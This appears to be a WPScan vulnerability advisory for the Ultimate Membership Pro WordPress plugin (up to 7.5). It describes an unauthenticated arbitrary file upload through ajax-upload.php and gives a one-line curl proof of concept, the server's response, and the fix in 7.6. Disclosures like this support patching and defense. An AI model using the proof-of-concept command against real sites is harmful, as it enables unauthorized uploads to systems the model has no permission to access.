WordPress Plugin Vulnerabilities

Ultimate Membership Pro <= 7.5 - Arbitrary media upload

Description

The ajax-upload.php endpoint doesn't check for the current user's capabilities (or that they are even logged in), so we can do a few things we shouldn't be able to do:

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

~$ curl -F "[email protected]" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

Typical WP media upload rules apply so YMMV on further exploiting this, but if nothing else you probably don't want random media uploaded to your site.

Proof of Concept

curl -F "[email protected]" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugins

indeed-membership-pro

Fixed in version 7.6

References

URL

https://codecanyon.net/comments/21539595

URL

https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253

Classification

Type

UPLOAD

CWE

CWE-434

Miscellaneous

Original Researcher

James Fraser

Submitter

fwaggle

Submitter twitter

fwaggle

Verified

WPVDB ID

2932dce5-375d-4a1d-8285-0bda5cb27a0a

Timeline

Publicly Published

2019-02-26 (about 3 years ago)

Added

2019-05-27 (about 3 years ago)

Last Updated

2020-02-07 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin